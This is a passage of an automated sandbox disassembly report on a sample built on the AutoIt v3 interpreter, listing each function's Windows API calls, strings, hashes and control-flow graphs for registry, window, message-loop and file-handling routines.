                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2695905019-0
                                                                                              • Opcode ID: bf6a00b993194173e044e29962b15f2cd984fb0f310f0c48d18c15591e7dac39
                                                                                              • Instruction ID: 288b2f883254f10b8f96cc3471266e57408a5c97e4e83dfe8648a7e1a806ea1b
                                                                                              • Opcode Fuzzy Hash: bf6a00b993194173e044e29962b15f2cd984fb0f310f0c48d18c15591e7dac39
                                                                                              • Instruction Fuzzy Hash: 01F0A070411A115782116B38AC0E9BA77AE9E41336B188719F875C32F0D7B0E9A586F9
                                                                                              Function 00D85078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,00D8504E,?,00E298D8,0000000C,00D851A5,?,00000002,00000000), ref: 00D85099
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00D8504E,?,00E298D8,0000000C,00D851A5,?,00000002,00000000), ref: 00D850A0
                                                                                              • ExitProcess.KERNEL32 ref: 00D850B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: bcda8fe5ad3063b4bf1de8725e6c4c77ffcc4410017ede046e9deb0874664e0b
                                                                                              • Instruction ID: 15878a85de836061c71d179a6b222e986981161cf3fe476cf6d06d13d35ba648
                                                                                              • Opcode Fuzzy Hash: bcda8fe5ad3063b4bf1de8725e6c4c77ffcc4410017ede046e9deb0874664e0b
                                                                                              • Instruction Fuzzy Hash: 96E0B631800648AFCF227F54ED09E683B6BEB40381F448014F9058A226DB36ED42DBB1
                                                                                              Function 00DBE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DBE60A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID: X64
                                                                                              • API String ID: 2645101109-893830106
                                                                                              • Opcode ID: c3ca7d66b12612861c0736d1ac50fd8b182fa108771d290ad1e66e5988963124
                                                                                              • Instruction ID: 71e42b1b6f57f223f99498506f4bcd81a47a89626778181b59c104e4a527158b
                                                                                              • Opcode Fuzzy Hash: c3ca7d66b12612861c0736d1ac50fd8b182fa108771d290ad1e66e5988963124
                                                                                              • Instruction Fuzzy Hash: 61D0E9B581511DEACB90CB90EC88DDD777DBB18344F104595F546E2140DB74D6499B60
                                                                                              Function 00DECD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 decd16-decd5a call d6bf07 * 3 7 decd5c-decd5f 0->7 8 decd65-decdd8 call d68e70 call ded6b1 call ded2f7 0->8 7->8 9 dece64-dece71 call d6e650 7->9 21 decdda-decde8 8->21 22 dece08-dece0d 8->22 16 ded1ef-ded212 call d6bd2c * 3 9->16 24 decded-decdfd 21->24 25 decdea 21->25 27 dece0f-dece24 RegConnectRegistryW 22->27 28 dece7c 22->28 29 decdff 24->29 30 dece02-dece06 24->30 25->24 33 dece76-dece7a 27->33 34 dece26-dece43 call d67ab0 27->34 31 dece80-deceab RegCreateKeyExW 28->31 29->30 35 dece61-dece63 30->35 36 decf0e-decf13 31->36 37 decead-dececa call d67ab0 31->37 33->31 47 dece48-dece58 34->47 48 dece45 34->48 35->9 40 decf19-decf42 call d68e70 call d84db8 36->40 41 ded1d6-ded1e7 RegCloseKey 36->41 52 dececf-decede 37->52 53 dececc 37->53 60 decf96-decfb9 call d68e70 call d84db8 40->60 61 decf44-decf91 call d68e70 call d84cf3 call d68e70 * 2 40->61 41->16 44 ded1e9-ded1ed RegCloseKey 41->44 44->16 49 dece5d 47->49 50 dece5a 47->50 48->47 49->35 50->49 55 decee3-decef9 call d6e650 52->55 56 decee0 52->56 53->52 55->16 62 deceff-decf09 RegCloseKey 55->62 56->55 71 decfbf-ded019 call d68e70 call d84cf3 call d68e70 * 2 RegSetValueExW 60->71 72 ded047-ded06a call d68e70 call d84db8 60->72 83 ded2bb-ded2c7 RegSetValueExW 61->83 62->16 71->41 102 ded01f-ded042 call d67ab0 call d6e650 71->102 87 ded156-ded179 call d68e70 call d84db8 72->87 88 ded070-ded0d6 call d68e70 call d8019b call d68e70 call d6605e 72->88 83->41 86 ded2cd-ded2f2 call d67ab0 call d6e650 83->86 86->41 107 ded17f-ded19f call d6c92d call d68e70 87->107 108 ded215-ded238 call d68e70 call d84db8 87->108 123 ded0d8-ded0dd 88->123 124 ded0f6-ded128 call d68e70 RegSetValueExW 88->124 102->41 131 ded1a1-ded1b4 RegSetValueExW 107->131 126 ded23a-ded260 call d6c5df call d68e70 108->126 127 ded265-ded282 call d68e70 call d84db8 108->127 128 ded0df-ded0e1 123->128 129 ded0e5-ded0e8 123->129 140 ded14a-ded151 call d801a4 124->140 141 ded12a-ded143 call d67ab0 call d6e650 124->141 126->131 143 ded1c5-ded1cf call d6e650 127->143 154 ded288-ded2b9 call dd276a call d68e70 call dd27da 127->154 128->129 129->123 133 ded0ea-ded0ec 129->133 131->41 136 ded1b6-ded1c0 call d67ab0 131->136 133->124 138 ded0ee-ded0f2 133->138 136->143 138->124 140->41 141->140 143->41 154->83
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DECE1C
                                                                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00DFDCD0,00000000,?,00000000,?,?), ref: 00DECEA3
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DECF03
                                                                                              • _wcslen.LIBCMT ref: 00DECF53
                                                                                              • _wcslen.LIBCMT ref: 00DECFCE
                                                                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00DED011
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DED120
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DED1AC
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00DED1E0
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DED1ED
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DED2BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 9721498-966354055
                                                                                              • Opcode ID: b157377c764fbbe167b297143335b6b4f3ae59aacb774c02ae8da00b33818e7a
                                                                                              • Instruction ID: 8fc45f9806ffc8a745db970a1e73ecad73ed49601f0a4aa42c76c0c790a1f363
                                                                                              • Opcode Fuzzy Hash: b157377c764fbbe167b297143335b6b4f3ae59aacb774c02ae8da00b33818e7a
                                                                                              • Instruction Fuzzy Hash: C4126A356043019FD714EF15C881A2AB7E6FF88714F08845DF99A9B3A2CB32ED41CBA1
                                                                                              Function 00D63E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 163 d63e15-d63e45 call d8019b call d8016b 168 d63e47-d63e49 163->168 169 d63e6e-d63e80 call d8919b 163->169 170 d63e4a-d63e50 168->170 169->170 176 d63e82-d63e94 call d8919b 169->176 172 d63e65-d63e6b 170->172 173 d63e52-d63e62 call d8015d call d801a4 170->173 173->172 181 d63e9a-d63eac call d8919b 176->181 182 da4585-da4587 176->182 186 d63eb2-d63ec4 call d8919b 181->186 187 da458c-da458f 181->187 182->170 190 d63eca-d63edc call d8919b 186->190 191 da4594-da45cb call d64154 call d64093 call d63fb8 call d84cf3 186->191 187->170 197 da462e-da4633 190->197 198 d63ee2-d63ef4 call d8919b 190->198 223 da4608-da460b 191->223 224 da45cd-da45d8 191->224 197->170 200 da4639-da4655 call d7e2e5 197->200 207 d63efa-d63f0c call d8919b 198->207 208 da4677-da4688 call dca316 198->208 210 da4662-da466a 200->210 211 da4657-da465b 200->211 219 d63f26 207->219 220 d63f0e-d63f20 call d8919b 207->220 221 da468a-da46d2 call d6b25f * 2 call d65379 call d63aa3 call d6bd2c * 2 208->221 222 da46dc-da46e2 208->222 210->170 218 da4670 210->218 211->200 217 da465d 211->217 217->170 218->208 230 d63f29-d63f2e call d6ad74 219->230 220->170 220->219 239 da4704-da4706 221->239 269 da46d4-da46d7 221->269 225 da46f5-da46ff call dca12a 222->225 226 da460d-da461b 223->226 227 da45f6-da4603 call d801a4 223->227 224->223 231 da45da-da45e1 224->231 225->239 238 da4620-da4629 call d801a4 226->238 227->225 241 d63f33-d63f35 230->241 231->227 236 da45e3-da45e7 231->236 236->227 242 da45e9-da45f4 236->242 238->170 239->170 246 d63f3b-d63f5e call d63fb8 call d64093 call d8919b 241->246 247 da46e4-da46e9 241->247 242->238 264 d63fb0-d63fb3 246->264 265 d63f60-d63f72 call d8919b 246->265 247->170 248 da46ef-da46f0 247->248 248->225 264->230 265->264 270 d63f74-d63f86 call d8919b 265->270 269->170 273 d63f9c-d63fa5 270->273 274 d63f88-d63f9a call d8919b 270->274 273->170 276 d63fab 273->276 274->230 274->273 276->230
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 0-1645009161
                                                                                              • Opcode ID: db758bbe1bd8f7a26192d7b81f64cf07fa8cb2ad7a906b26d5262a25f57ef3f9
                                                                                              • Instruction ID: 854a1040f777e3a6e0fd49a8511374bdfbecd5ec956c84c043c32722d447642f
                                                                                              • Opcode Fuzzy Hash: db758bbe1bd8f7a26192d7b81f64cf07fa8cb2ad7a906b26d5262a25f57ef3f9
                                                                                              • Instruction Fuzzy Hash: B6812671A44306BFDB10AF64CC46FBE7BA9EF56700F084024F945AA182EBB1DA05C7B5
                                                                                              Function 00D6EE07 Relevance: 21.6, APIs: 14, Instructions: 611windowsleeptimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00D6EEB7
                                                                                              • timeGetTime.WINMM ref: 00D6F0B7
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F1D8
                                                                                              • TranslateMessage.USER32(?), ref: 00D6F22B
                                                                                              • DispatchMessageW.USER32(?), ref: 00D6F239
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F24F
                                                                                              • Sleep.KERNELBASE(0000000A), ref: 00D6F261
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                              • String ID:
                                                                                              • API String ID: 2189390790-0
                                                                                              • Opcode ID: 414589bff7bcb1546387bc725d84ba4b2123d33bc636ee0dff66dbc083ac875c
                                                                                              • Instruction ID: cf08520674afdcb29da68b3e913330b79290bf013ec7845b963e1aef556831fe
                                                                                              • Opcode Fuzzy Hash: 414589bff7bcb1546387bc725d84ba4b2123d33bc636ee0dff66dbc083ac875c
                                                                                              • Instruction Fuzzy Hash: EE32E230608741EFD724DF24D848BAABBE1FF85304F18852DE59687292D771E948DBB2
                                                                                              Function 00D63696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 677 d63696-d636ab 678 d636ad-d636b0 677->678 679 d6370b-d6370d 677->679 681 d636b2-d636b9 678->681 682 d63711 678->682 679->678 680 d6370f 679->680 683 d636f6-d636fe DefWindowProcW 680->683 686 d636bf-d636c4 681->686 687 d6378b-d63793 PostQuitMessage 681->687 684 d63717-d6371c 682->684 685 da3dce-da3df6 call d62f24 call d7f1c6 682->685 693 d63704-d6370a 683->693 688 d63743-d6376a SetTimer RegisterWindowMessageW 684->688 689 d6371e-d63721 684->689 723 da3dfb-da3e02 685->723 690 da3e3b-da3e4f call dcc80c 686->690 691 d636ca-d636ce 686->691 694 d6373f-d63741 687->694 688->694 697 d6376c-d63777 CreatePopupMenu 688->697 695 d63727-d6373a KillTimer call d6388e call d6572c 689->695 696 da3d6f-da3d72 689->696 690->694 717 da3e55 690->717 698 d636d4-d636d9 691->698 699 d63795-d6379f call d7fcbb 691->699 694->693 695->694 703 da3daa-da3dc9 MoveWindow 696->703 704 da3d74-da3d78 696->704 697->694 706 d636df-d636e4 698->706 707 da3e20-da3e27 698->707 710 d637a4 699->710 703->694 711 da3d7a-da3d7d 704->711 712 da3d99-da3da5 SetFocus 704->712 715 d636ea-d636f0 706->715 716 d63779-d63789 call d637a6 706->716 707->683 714 da3e2d-da3e36 call dc1367 707->714 710->694 711->715 719 da3d83-da3d94 call d62f24 711->719 712->694 714->683 715->683 715->723 716->694 717->683 719->694 723->683 724 da3e08-da3e1b call d6388e call d638f2 723->724 724->683
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D63690,?,?), ref: 00D636FE
                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00D63690,?,?), ref: 00D6372A
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D6374D
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D63690,?,?), ref: 00D63758
                                                                                              • CreatePopupMenu.USER32 ref: 00D6376C
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00D6378D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: 0$$0$$TaskbarCreated
                                                                                              • API String ID: 129472671-3836791346
                                                                                              • Opcode ID: 7658efdae5dfc04114baaaa9e7b30abca1e170d5d38c62b549648f780bd0811d
                                                                                              • Instruction ID: b79425469cef6744bc842a60f498464eaeebfe1ebf9a507117587cd665868be7
                                                                                              • Opcode Fuzzy Hash: 7658efdae5dfc04114baaaa9e7b30abca1e170d5d38c62b549648f780bd0811d
                                                                                              • Instruction Fuzzy Hash: A04123B1104249BBEB282BB8DC4EB793E67EB45310F18422DF696DA291DB74DB04D731
                                                                                              Function 00D635AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00D635DE
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00D63608
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D63619
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00D63636
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D63646
                                                                                              • LoadIconW.USER32(000000A9), ref: 00D6365C
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D6366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: b8415a5e3016d0c4c1564cbb4eef35722213c4b34a3694e23c9a96a1842764b7
                                                                                              • Instruction ID: 7e07bbb0faf364d02d7ba2680dd9bdc991750ac3c2734a24b292df8a333c15da
                                                                                              • Opcode Fuzzy Hash: b8415a5e3016d0c4c1564cbb4eef35722213c4b34a3694e23c9a96a1842764b7
                                                                                              • Instruction Fuzzy Hash: 7A21E4B190130CAFDB009FA5E849BADBFB6FB08700F10811AE651EA2A0D7B45548CFA4
                                                                                              Function 00DA09FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 734 da09fb-da0a2b call da07cf 737 da0a2d-da0a38 call d8f656 734->737 738 da0a46-da0a52 call d955b1 734->738 745 da0a3a-da0a41 call d8f669 737->745 743 da0a6b-da0ab4 call da073a 738->743 744 da0a54-da0a69 call d8f656 call d8f669 738->744 754 da0b21-da0b2a GetFileType 743->754 755 da0ab6-da0abf 743->755 744->745 752 da0d1d-da0d23 745->752 756 da0b2c-da0b5d GetLastError call d8f633 CloseHandle 754->756 757 da0b73-da0b76 754->757 759 da0ac1-da0ac5 755->759 760 da0af6-da0b1c GetLastError call d8f633 755->760 756->745 771 da0b63-da0b6e call d8f669 756->771 763 da0b78-da0b7d 757->763 764 da0b7f-da0b85 757->764 759->760 765 da0ac7-da0af4 call da073a 759->765 760->745 768 da0b89-da0bd7 call d954fa 763->768 764->768 769 da0b87 764->769 765->754 765->760 776 da0bd9-da0be5 call da094b 768->776 777 da0be7-da0c0b call da04ed 768->777 769->768 771->745 776->777 783 da0c0f-da0c19 call d98a3e 776->783 784 da0c1e-da0c61 777->784 785 da0c0d 777->785 783->752 787 da0c82-da0c90 784->787 788 da0c63-da0c67 784->788 785->783 791 da0d1b 787->791 792 da0c96-da0c9a 787->792 788->787 790 da0c69-da0c7d 788->790 790->787 791->752 792->791 793 da0c9c-da0ccf CloseHandle call da073a 792->793 796 da0d03-da0d17 793->796 797 da0cd1-da0cfd GetLastError call d8f633 call d956c3 793->797 796->791 797->796
                                                                                              APIs
                                                                                                • Part of subcall function 00DA073A: CreateFileW.KERNELBASE(00000000,00000000,?,00DA0AA4,?,?,00000000,?,00DA0AA4,00000000,0000000C), ref: 00DA0757
                                                                                              • GetLastError.KERNEL32 ref: 00DA0B0F
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0B16
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 00DA0B22
                                                                                              • GetLastError.KERNEL32 ref: 00DA0B2C
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0B35
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DA0B55
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DA0C9F
                                                                                              • GetLastError.KERNEL32 ref: 00DA0CD1
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0CD8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 1dd2470525e400410cf9f814af320df18d69b12db8c9ef65b65df5e0cfb3a428
                                                                                              • Instruction ID: 580dc9e1e7f2a62cdbf8e4e9f74823c9848f0fcb335721bcbec8f923f988b051
                                                                                              • Opcode Fuzzy Hash: 1dd2470525e400410cf9f814af320df18d69b12db8c9ef65b65df5e0cfb3a428
                                                                                              • Instruction Fuzzy Hash: 34A1F532A042088FDF19AF68D856BAD7FA1EB06324F18015DF815EB3E1D7359916CB72
                                                                                              Function 00D6522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00D6551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00D65539
                                                                                                • Part of subcall function 00D651BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D651E1
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D6534B
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DA4BD7
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DA4C18
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00DA4C5A
                                                                                              • _wcslen.LIBCMT ref: 00DA4CC1
                                                                                              • _wcslen.LIBCMT ref: 00DA4CD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 98802146-2727554177
                                                                                              • Opcode ID: 0bfa8992668785b3b9ead2fa1e82a283a873c022a9f2cd936e246078d8aa55c7
                                                                                              • Instruction ID: ad53ee66f4691eb8fdbf5bc9fdd1d0d252ceb617f1c76ecb50b6245b8635d3db
                                                                                              • Opcode Fuzzy Hash: 0bfa8992668785b3b9ead2fa1e82a283a873c022a9f2cd936e246078d8aa55c7
                                                                                              • Instruction Fuzzy Hash: 2F715A71104304AFC300EF66D889DAABBE8FF99750B40842EF555D71A0EB709A88CB71
                                                                                              Function 00D6345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00D63465
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00D63474
                                                                                              • LoadIconW.USER32(00000063), ref: 00D6348A
